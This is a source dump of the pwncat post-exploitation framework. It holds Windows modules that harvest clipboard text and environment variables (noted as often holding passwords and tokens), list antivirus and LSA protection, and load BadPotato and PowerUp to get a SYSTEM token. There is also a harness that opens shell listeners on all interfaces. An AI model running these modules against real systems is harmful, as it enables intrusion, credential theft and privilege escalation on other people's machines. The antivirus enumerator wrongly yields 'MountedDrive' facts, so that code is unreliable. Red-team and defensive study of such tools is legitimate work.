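        """Yield one :class:`MountedDrive` fact per registered antivirus product.

        ``wmic.exe`` is asked for the ``displayName`` and
        ``pathToSignedReportingExe`` of every ``AntiVirusProduct`` instance
        in ``root\\SecurityCenter2`` as CSV. Blank lines and the header row
        are skipped; a row that does not split into three fields is skipped
        as well instead of aborting the whole enumeration.

        :param session: the session to enumerate
        """

        # NOTE(review): wmic.exe is deprecated on current Windows releases and
        # may be absent; an empty result then means "no tool", not "no AV".
        proc = session.platform.Popen(
            [
                "wmic.exe",
                "/Node:localhost",
                "/Namespace:\\\\root\\SecurityCenter2",
                "Path",
                "AntiVirusProduct",
                "Get",
                "displayName,pathToSignedReportingExe",
                "/Format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                # Skip padding lines and the column header
                if not line or "displayName,pathToSignedReportingExe" in line:
                    continue

                # Columns are Node,displayName,pathToSignedReportingExe. Split
                # at most twice so a comma inside the executable path stays
                # part of the path instead of producing an extra column that
                # would make the unpacking below raise.
                fields = line.split(",", 2)
                if len(fields) != 3:
                    # Unparseable row (e.g. wmic error text): skip, don't abort
                    continue

                _, av_name, exe_path = fields
                yield MountedDrive(self.name, av_name, exe_path)

        proc.wait()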
63 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/protections/lsa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.db import Fact
4 | from pwncat.modules import ModuleFailed
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import EnumerateModule
7 |
8 |
class LSAProtectionData(Fact):
    """Fact recording whether LSA protection (RunAsPPL) is active."""

    def __init__(self, source, active: bool):
        super().__init__(source=source, types=["protections.lsa"])
        self.active: bool = active

    def title(self, session):
        """One-line state: active in red, inactive in green."""
        if self.active:
            state = "[bold red]active[/bold red]"
        else:
            state = "[bold green]inactive[/bold green]"
        return "LSA Protection is " + state

    def description(self, session):
        """This fact carries no extended description."""
        return None
26 |
27 |
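class Module(EnumerateModule):
    """Determine whether LSA protection (RunAsPPL) is enabled on the target"""

    PROVIDES = ["protections.lsa"]
    PLATFORM = [Windows]

    def enumerate(self, session):
        """Yield a single :class:`LSAProtectionData` fact.

        Reads ``RunAsPPL`` under ``HKLM:\\SYSTEM\\CurrentControlSet\\Control\\LSA``
        through PowerShell. A value that does not exist is reported as
        inactive; any other PowerShell failure, or an empty result, raises
        ``ModuleFailed``.

        :param session: the session to enumerate
        :raises ModuleFailed: when the registry value cannot be read
        """

        registry_value = "RunAsPPL"
        registry_key = "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\LSA"

        try:
            # Both interpolated operands are fixed literals, never user input
            result = session.platform.powershell(
                f"Get-ItemPropertyValue {registry_key} -Name {registry_value}"
            )

            if not result:
                raise ModuleFailed(
                    f"failed to retrieve registry value {registry_value}"
                )

            # Any truthy RunAsPPL value is reported as active. This assumes the
            # value arrives as a number; a string such as "0" would be truthy
            # -- TODO confirm the powershell() return type.
            status = bool(result[0])

        except PowershellError as exc:
            if "does not exist" in exc.message:
                # Value never configured: report inactive. NOTE(review): newer
                # Windows 11 builds may enable LSA protection without this
                # value being present, so treat "inactive" as unconfirmed.
                status = False
            else:
                raise ModuleFailed(
                    f"could not retrieve registry value {registry_value}: {exc}"
                ) from exc

        yield LSAProtectionData(self.name, status)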
60 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/system/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/clipboard.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
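class ClipboardData(Fact):
    """Fact holding the text currently on the target's clipboard."""

    def __init__(self, source, contents: str):
        super().__init__(source=source, types=["system.clipboard"])
        # Clipboard text exactly as handed in by the enumerate module
        # (annotation corrected: this is a str, not a bool)
        self.contents: str = contents

    def title(self, session):
        return "Current clipboard contents:"

    def description(self, session):
        """Clipboard text, escaped so it cannot inject rich markup."""
        return f"[yellow]{rich.markup.escape(self.contents)}[/yellow]"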
23 |
24 |
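class Module(EnumerateModule):
    """Enumerate the current clipboard contents on the target"""

    PROVIDES = ["system.clipboard"]
    PLATFORM = [Windows]

    def enumerate(self, session):
        """Yield a single :class:`ClipboardData` holding the clipboard text.

        ``Get-Clipboard`` is run through PowerShell. An empty result yields
        nothing; a multi-line clipboard (returned as a list) is joined with
        newlines. A PowerShell failure raises ``ModuleFailed``.

        :param session: the session to enumerate
        :raises ModuleFailed: when the clipboard cannot be read
        """

        try:
            result = session.platform.powershell("Get-Clipboard")

            # Nothing on the clipboard (or nothing returned)
            if not result:
                return

            # Several lines of text come back as a list of strings. The
            # earlier `and result` guard was redundant: result is already
            # known to be truthy here.
            if isinstance(result[0], list):
                contents = "\n".join(result[0])
            else:
                contents = result[0]

        except PowershellError as exc:
            raise ModuleFailed("failed to retrieve clipboard contents") from exc

        # Clipboard text frequently holds passwords and tokens; the fact keeps
        # it verbatim and only escapes it for display.
        yield ClipboardData(self.name, contents)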
48 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/environment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
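class EnvironmentData(Fact):
    """Fact holding one environment variable of the target process."""

    def __init__(self, source, variable: str, value: str):
        super().__init__(source=source, types=["system.environment"])
        # Annotation corrected: the variable name is a str, not a bool
        self.variable: str = variable
        self.value: str = value

    def title(self, session):
        """``NAME = value`` with both sides escaped for rich markup."""
        return f"[cyan]{rich.markup.escape(self.variable)}[/cyan] = [blue]{rich.markup.escape(self.value)} [/blue]"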
21 |
22 |
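class Module(EnumerateModule):
    """Enumerate the environment variables of the current process on the target"""

    PROVIDES = ["system.environment"]
    PLATFORM = [Windows]

    def enumerate(self, session):
        """Yield an :class:`EnvironmentData` fact per variable in the ``env:`` drive.

        Runs ``Get-ChildItem env:\\ | Select Name,Value`` through PowerShell.
        An empty result or a PowerShell failure raises ``ModuleFailed``.

        :param session: the session to enumerate
        :raises ModuleFailed: when the env: drive cannot be listed
        """

        try:
            result = session.platform.powershell(
                "Get-ChildItem env:\\ | Select Name,Value"
            )

            if not result:
                raise ModuleFailed("failed to retrieve env: PSDrive")

            environment = result[0]

        except PowershellError as exc:
            raise ModuleFailed("failed to retrieve env: PSDrive") from exc

        # A single Name/Value record comes back as a bare dict rather than a
        # list, the same convention the other powershell-based modules handle
        if isinstance(environment, dict):
            environment = [environment]

        # Environment variables routinely carry secrets (tokens, connection
        # strings); the fact escapes values for display only.
        for pair in environment:
            yield EnvironmentData(self.name, pair["Name"], pair["Value"])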
46 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/programs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
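class InstalledProgramData(Fact):
    """Fact naming one entry found under a Program Files directory."""

    def __init__(self, source, path: str):
        super().__init__(source=source, types=["system.programs"])
        # Annotation corrected: the full path is a str, not a bool
        self.path: str = path

    def title(self, session):
        """The path's repr, escaped for rich markup."""
        return f"{rich.markup.escape(repr(self.path))}"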
20 |
21 |
class Module(EnumerateModule):
    """Enumerate the entries under the Program Files directories on the target"""

    PROVIDES = ["system.programs"]
    PLATFORM = [Windows]

    def enumerate(self, session):
        """Yield an :class:`InstalledProgramData` per entry under the Program Files roots.

        Lists ``C:\\Program Files`` and ``C:\\Program Files (x86)`` via
        PowerShell, selecting ``FullName``. A PowerShell failure or an empty
        result raises ``ModuleFailed``.
        """
        listing = 'Get-ChildItem "C:\\Program Files","C:\\Program Files (x86)" -ErrorAction SilentlyContinue | Select Fullname'

        try:
            entries = session.platform.powershell(listing)[0]

            # A single entry is returned bare rather than wrapped in a list
            if not isinstance(entries, list):
                entries = [entries]

            for entry in entries:
                yield InstalledProgramData(self.name, entry["FullName"])

        except (PowershellError, IndexError) as exc:
            raise ModuleFailed(
                f"failed to list program file directories: {exc}"
            ) from exc
45 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/token/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/potato.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, ModuleFailed
5 | from pwncat.facts.windows import UserToken
6 | from pwncat.platform.windows import Windows, ProtocolError
7 | from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
8 |
9 |
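class Module(EnumerateModule):
    """Run the BadPotato exploit to obtain an ``NT AUTHORITY\\SYSTEM`` token.

    Unlike most enumeration modules this one is *active*: it loads the
    ``BadPotato.dll`` .NET assembly into the C2 via ``dotnet_load`` and
    triggers the exploit on the target, then yields the resulting token as a
    :class:`UserToken` fact. Treat it as an exploitation step rather than a
    passive lookup when deciding whether it is acceptable on an engagement.
    """

    PLATFORM = [Windows]
    SCHEDULE = Schedule.PER_USER
    SCOPE = Scope.SESSION
    PROVIDES = ["token", "ability.execute"]

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield a SYSTEM ``UserToken`` if the exploit succeeds.

        Raises ``ModuleFailed`` when the plugin cannot be loaded or the
        exploit fails with a C2 ``ProtocolError``.
        """

        # Non-admin users will crash the C2 if we try bad potato, so bail out
        # early rather than lose the session.
        # NOTE(review): is_admin() is a coarse gate; the potato family is
        # generally tied to impersonation privileges rather than admin
        # membership -- confirm before relaxing or tightening this check.
        if not session.platform.is_admin():
            return

        # Track which step failed so the error names it; the first message is
        # kept identical to the historical "failed to load badpotato" text.
        stage = "load badpotato"
        try:
            yield Status("loading badpotato c2 plugin...")
            badpotato = session.platform.dotnet_load("BadPotato.dll")

            stage = "trigger badpotato exploit"
            yield Status("triggering badpotato exploit...")
            token = badpotato.get_system_token()

            # Yield the new SYSTEM token
            yield UserToken(
                source=self.name,
                uid=session.find_user(name="NT AUTHORITY\\SYSTEM").id,
                token=token,
            )
        except ProtocolError as exc:
            raise ModuleFailed(f"failed to {stage}: {exc}") from exc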
41 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/privs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.modules import ModuleFailed
4 | from pwncat.facts.windows import ProcessTokenPrivilege
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
7 |
8 |
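class Module(EnumerateModule):
    """Enumerate the privileges held by the current process token.

    Relies on PowerUp's ``Get-ProcessTokenPrivilege`` (brought in through the
    ``powersploit`` module) and yields one :class:`ProcessTokenPrivilege` fact
    per privilege, recording its name, attribute flags, the token handle and
    the PID it was read from.
    """

    PLATFORM = [Windows]
    SCHEDULE = Schedule.PER_USER
    SCOPE = Scope.SESSION
    PROVIDES = ["token.privilege"]

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield ``ProcessTokenPrivilege`` facts for the current token.

        Raises ``ModuleFailed`` if the PowerUp cmdlet errors or returns no
        result.
        """

        # Load PowerUp.ps1 so Get-ProcessTokenPrivilege is available.
        session.run("powersploit", group="privesc")

        try:
            privs = session.platform.powershell("Get-ProcessTokenPrivilege")[0]
        except (IndexError, PowershellError) as exc:
            raise ModuleFailed(
                f"failed to find process token privs: {exc}"
            ) from exc

        # A token holding a single privilege comes back as one object rather
        # than a list (the other Windows enumerators handle the same case);
        # iterating a dict would hand us its keys, so normalise first.
        if not isinstance(privs, list):
            privs = [privs]

        for priv in privs:
            yield ProcessTokenPrivilege(
                source=self.name,
                name=priv["Privilege"],
                attributes=priv["Attributes"],
                handle=priv["TokenHandle"],
                pid=priv["ProcessId"],
            )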
36 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/user/group.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import ModuleFailed
5 | from pwncat.facts.windows import WindowsGroup
6 | from pwncat.platform.windows import Windows, PowershellError
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
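class Module(EnumerateModule):
    """Enumerate local groups (and their members) on a Windows target.

    Groups come from ``Get-LocalGroup``; for each one the member SIDs are
    collected with ``Get-LocalGroupMember``. A failed membership lookup is
    tolerated and yields an empty member list rather than aborting the
    whole enumeration.
    """

    PROVIDES = ["group"]
    PLATFORM = [Windows]
    SCHEDULE = Schedule.ONCE

    @staticmethod
    def _sid_value(sid):
        """Return the SID string from either a bare string or a serialized
        SecurityIdentifier object (``{"Value": "S-1-5-..."}``)."""
        if isinstance(sid, dict):
            return sid["Value"]
        return sid

    def _group_members(self, session, name: str) -> list:
        """Return the member SIDs of local group ``name``; empty on error."""

        # The group name is target-controlled data that ends up inside a
        # PowerShell command line, so single-quote it (doubling embedded
        # quotes) instead of splicing it in bare. Quoting also fixes groups
        # whose names contain spaces ("Remote Desktop Users"): unquoted, the
        # cmdlet would parse the extra words as further arguments, error out,
        # and the group would silently be reported as having no members.
        quoted = "'" + name.replace("'", "''") + "'"

        try:
            result = session.platform.powershell(f"Get-LocalGroupMember {quoted}")
        except PowershellError:
            return []

        if not result:
            return []

        # One member comes back as a single object rather than a list.
        members = result[0] if isinstance(result[0], list) else [result[0]]
        return [self._sid_value(m["SID"]) for m in members]

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield one ``WindowsGroup`` fact per local group.

        Raises ``ModuleFailed`` if ``Get-LocalGroup`` fails or returns
        nothing.
        """

        try:
            groups = session.platform.powershell("Get-LocalGroup")
        except PowershellError as exc:
            raise ModuleFailed(str(exc)) from exc

        if not groups:
            raise ModuleFailed("no groups returned from Get-LocalGroup")

        # A single group comes back as one object rather than a list.
        group_list = groups[0] if isinstance(groups[0], list) else [groups[0]]

        for group in group_list:
            yield WindowsGroup(
                source=self.name,
                name=group["Name"],
                gid=group["SID"],
                description=group["Description"],
                principal_source=group["PrincipalSource"],
                members=self._group_members(session, group["Name"]),
            )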
49 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/manage/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/manage/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/manage/powershell/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/manage/powershell/__init__.py
--------------------------------------------------------------------------------
/pwncatrc:
--------------------------------------------------------------------------------
1 | ./data/pwncatrc
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [tool.isort]
2 | profile = "black"
3 | length_sort = true
4 |
5 | [tool.pytest.ini_options]
6 | minversion = "6.0"
7 | testpaths = [
8 | "tests",
9 | ]
10 | addopts = "-v"
11 |
12 | [tool.poetry]
13 | name = "pwncat-cs"
14 | version = "0.5.4"
15 | description = "Reverse and bind shell automation framework"
16 | authors = ["Caleb Stewart ", "John Hammond"]
17 | readme = "README.md"
18 | repository = "https://github.com/calebstewart/pwncat"
19 | documentation = "https://pwncat.readthedocs.io"
20 | keywords = ["offsec", "cyber", "exploitation", "privesc", "automation"]
21 | packages = [
22 | { include = "pwncat" },
23 | ]
24 | license = "MIT"
25 |
26 | [tool.poetry.scripts]
27 | pwncat-cs = "pwncat.__main__:main"
28 |
29 | [tool.poetry.urls]
30 | "Bug Tracker" = "https://github.com/calebstewart/pwncat/issues"
31 |
32 | [tool.poetry.dependencies]
33 | python = "^3.9"
34 | netifaces = "^0.11.0"
35 | packaging = "^20.9"
36 | prompt-toolkit = "^3.0.19"
37 | pycryptodome = "^3.10.1"
38 | requests = "^2.25.1"
39 | rich = "^10.4.0"
40 | python-rapidjson = "^1.0"
41 | ZODB3 = "^3.11.0"
42 | zodburi = "^2.5.0"
43 | Jinja2 = "^3.0.1"
44 | paramiko-ng = "^2.8.8"
45 | PyNaCl = "^1.4.0"
46 | sphinx-toolbox = { version = "^2.15.2", optional = true }
47 | Sphinx = { version= "^4.0.2", optional = true }
48 | enum-tools = { version= "^0.7.0", optional = true }
49 | furo = { version= "^2021.11.23", optional = true }
50 |
51 | [tool.poetry.dev-dependencies]
52 | isort = "^5.8.0"
53 | pytest = "^6.2.4"
54 | flake8 = "^3.9.2"
55 |
56 | [tool.poetry.extras]
57 | docs = ["sphinx-toolbox", "Sphinx", "enum-tools", "furo"]
58 |
59 | [build-system]
60 | requires = ["poetry-core>=1.0.0"]
61 | build-backend = "poetry.core.masonry.api"
62 |
--------------------------------------------------------------------------------
/run-tests.sh:
--------------------------------------------------------------------------------
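#!/bin/sh
## Run pytest for pwncat. This script will start up the needed
## containers locally and then kick off pytest, pointing at the
## containers.
##
## The containers are killed when pytest finishes, when the script is
## interrupted, or when one of the setup steps fails (EXIT trap), and
## the script exits with pytest's own status so callers can rely on it.

echo "[!] we can only test centos and ubuntu locally"

CENTOS_CONTAINER=""
UBUNTU_CONTAINER=""

## Kill whichever containers were started. Registered as an EXIT trap so
## the published ports (22, 4444, 9999 mapped onto the host) do not stay
## reachable after an aborted run.
cleanup() {
    if [ -n "$CENTOS_CONTAINER" ]; then
        podman container kill "$CENTOS_CONTAINER"
        echo "[+] killed centos container"
    fi
    if [ -n "$UBUNTU_CONTAINER" ]; then
        podman container kill "$UBUNTU_CONTAINER"
        echo "[+] killed ubuntu container"
    fi
}
trap cleanup EXIT

CENTOS_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:centos) || exit 1
echo "[+] started centos container: $CENTOS_CONTAINER"
UBUNTU_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:ubuntu) || exit 1
echo "[+] started ubuntu container: $UBUNTU_CONTAINER"

## Ask podman which host port it mapped 4444/tcp to for each container.
CENTOS_BIND_PORT=$(podman inspect "$CENTOS_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')
UBUNTU_BIND_PORT=$(podman inspect "$UBUNTU_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')

## jq prints "null" (or nothing) when the mapping is missing; fail early
## instead of handing pytest an empty port.
if [ -z "$CENTOS_BIND_PORT" ] || [ "$CENTOS_BIND_PORT" = "null" ] \
    || [ -z "$UBUNTU_BIND_PORT" ] || [ "$UBUNTU_BIND_PORT" = "null" ]; then
    echo "[-] could not determine bind ports from podman inspect" >&2
    exit 1
fi

echo "[+] centos bind port: $CENTOS_BIND_PORT"
echo "[+] ubuntu bind port: $UBUNTU_BIND_PORT"

## "$@" is quoted so pytest arguments containing spaces survive intact.
CENTOS_HOST="127.0.0.1" CENTOS_BIND_PORT=$CENTOS_BIND_PORT UBUNTU_HOST="127.0.0.1" UBUNTU_BIND_PORT=$UBUNTU_BIND_PORT \
    pytest "$@"
status=$?

## cleanup runs via the EXIT trap; propagate pytest's result.
exit $status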
26 |
--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
1 | #!./env/bin/python
2 | import json
3 | import stat
4 | import time
5 | import shutil
6 | import subprocess
7 |
8 | import pwncat.manager
9 | import pwncat.platform.windows
10 |
# Create a manager from the repository's development rc file (data/pwncatrc).
# This script is a developer harness rather than part of the test-suite: it
# opens listeners and drops straight into the interactive prompt.
with pwncat.manager.Manager("data/pwncatrc") as manager:

    # Tell the manager to create verbose sessions that
    # log all commands executed on the remote host
    # manager.config.set("verbose", True, glob=True)

    # Establish a session
    # session = manager.create_session("windows", host="192.168.56.10", port=4444)
    # session = manager.create_session("windows", host="192.168.122.11", port=4444)
    # session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
    # session = manager.create_session("linux", host="127.0.0.1", port=4444)
    # session = manager.create_session(
    #     "linux", certfile="/tmp/cert.pem", keyfile="/tmp/cert.pem", port=4444
    # )

    # session.platform.powershell("amsiutils")

    # NOTE(review): both listeners bind 0.0.0.0, so any host that can reach
    # this machine can connect (a genuine or a spoofed shell) to them; on a
    # shared network bind a specific interface or firewall the ports. The
    # plain "socket" protocol carries no authentication -- the commented-out
    # certfile/keyfile session above suggests a TLS channel exists; confirm
    # in pwncat/channel before relying on it.
    listener = manager.create_listener(
        protocol="socket", host="0.0.0.0", port=4444, platform="windows"
    )
    # The first listener object is overwritten here; presumably the manager
    # keeps its own reference -- verify if a handle to it is ever needed.
    listener = manager.create_listener(protocol="socket", host="0.0.0.0", port=9999)

    # Hand control to the pwncat prompt; returns when the user exits.
    manager.interactive()
35 |
--------------------------------------------------------------------------------
/tests/test_fileio.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.util import random_string
4 |
5 |
def do_file_test(session, content):
    """Round-trip ``content`` through a fresh file on the target.

    Writes ``content`` (``str`` or ``bytes``) to a randomly named ``.txt``
    file through ``session.platform.open``, checks the reported write count,
    reads it back and asserts it is unchanged, then lists ``/`` to make sure
    the remote shell is still responsive afterwards. The file is not removed
    and therefore remains on the test container.
    """

    suffix = "b" if isinstance(content, bytes) else ""
    filename = f"{random_string()}.txt"

    with session.platform.open(filename, suffix + "w") as handle:
        written = handle.write(content)
        assert written == len(content)

    with session.platform.open(filename, suffix + "r") as handle:
        echoed = handle.read()
        assert echoed == content

    # Reading/writing has been known to hang the shell; a directory listing
    # afterwards proves it is still alive.
    root_entries = list(session.platform.Path("/").iterdir())
    assert len(root_entries) > 0
21 |
22 |
def test_small_text(session):
    """Round-trip a short text-only payload through a remote file."""

    payload = "hello world"
    do_file_test(session, payload)
27 |
28 |
def test_large_text(session):
    """Round-trip a multi-line text file (10 lines of 1000 'A's)."""

    line = "A" * 1000 + "\n"
    payload = line * 10
    do_file_test(session, payload)
34 |
35 |
def test_small_binary(session):
    """Round-trip the 32 lowest byte values, including NUL and control bytes."""

    payload = bytes(range(32))
    do_file_test(session, payload)
41 |
42 |
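def test_large_binary(session):
    """Round-trip a larger binary payload (the 32 lowest byte values, 400x).

    Exercises the same control-byte handling as ``test_small_binary`` but at
    a size (12,800 bytes) large enough to span several transfer chunks.
    """

    contents = bytes(range(32)) * 400
    do_file_test(session, contents)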
47 |
--------------------------------------------------------------------------------
/tests/test_manager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import io
3 |
4 | import pwncat.manager
5 |
6 |
def test_config_fileobj():
    """A file-like object passed as ``config`` is parsed like a pwncatrc.

    Uses an in-memory database so nothing is persisted by the test, and
    checks that one option (``backdoor_user``) round-trips into
    ``manager.config``.
    """

    rc_text = """
set -g db "memory://"
set -g prefix c-k
set -g on_load { }
set -g backdoor_user "config_test"
"""
    config_stream = io.StringIO(rc_text)

    with pwncat.manager.Manager(config=config_stream) as manager:
        loaded = manager.config["backdoor_user"]
        assert loaded == "config_test"
20 |
21 |
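def test_user_config(tmp_path):
    """The user rc file under ``$XDG_DATA_HOME/pwncat/pwncatrc`` is loaded.

    Points ``XDG_DATA_HOME`` at ``tmp_path``, writes a minimal rc file there,
    and checks that a ``Manager`` built with ``config=None`` picks up the
    ``backdoor_user`` value from it. The environment variable and the working
    directory are both restored afterwards so later tests are unaffected.
    """

    import os

    # Save everything this test mutates in the process so it can be undone.
    old_home = os.environ.get("XDG_DATA_HOME", None)
    old_cwd = os.getcwd()

    try:
        # Point the XDG data home at our temp path
        os.environ["XDG_DATA_HOME"] = str(tmp_path)

        # Create the pwncat directory and our user configuration
        rc_dir = tmp_path / "pwncat"
        rc_dir.mkdir(exist_ok=True, parents=True)
        with (rc_dir / "pwncatrc").open("w") as filp:
            filp.write('set -g backdoor_user "config_test"\n')

        os.chdir(tmp_path)

        # Create a manager object with default config to load our
        # user configuration.
        with pwncat.manager.Manager(config=None) as manager:
            assert manager.config["backdoor_user"] == "config_test"
    finally:
        # Restore the working directory as well as the environment; leaving
        # the process chdir'd into tmp_path would leak into other tests.
        os.chdir(old_cwd)
        if old_home is not None:
            os.environ["XDG_DATA_HOME"] = old_home
        else:
            os.environ.pop("XDG_DATA_HOME", None)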
52 |
--------------------------------------------------------------------------------
/tests/test_test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import io
3 |
4 | import pytest
5 | import paramiko
6 |
--------------------------------------------------------------------------------